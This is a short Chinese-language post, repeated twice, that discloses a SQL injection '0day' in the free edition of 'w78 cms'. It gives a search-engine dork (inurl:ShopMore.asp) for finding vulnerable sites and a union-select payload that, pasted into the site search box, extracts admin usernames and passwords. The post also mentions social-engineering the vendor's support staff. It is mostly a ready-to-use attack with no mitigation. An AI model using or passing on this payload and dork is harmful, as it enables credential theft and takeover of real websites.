w78 cms免费版的0day
本来是不想爆出来的 在社工客服的时候 我跟客服报告漏洞 想不到他说 免费版不提供任何技术支持
而且发现 使用免费版的 不是少数。。 可见其不负责任
关键字:inurl:ShopMore.asp
% and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where %=
丢到搜索栏那里 直接爆出来~ 源码就不分析了 搜索型的注入
本来是不想爆出来的 在社工客服的时候 我跟客服报告漏洞 想不到他说 免费版不提供任何技术支持
而且发现 使用免费版的 不是少数。。 可见其不负责任
关键字:inurl:ShopMore.asp
% and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where %=
丢到搜索栏那里 直接爆出来~ 源码就不分析了 搜索型的注入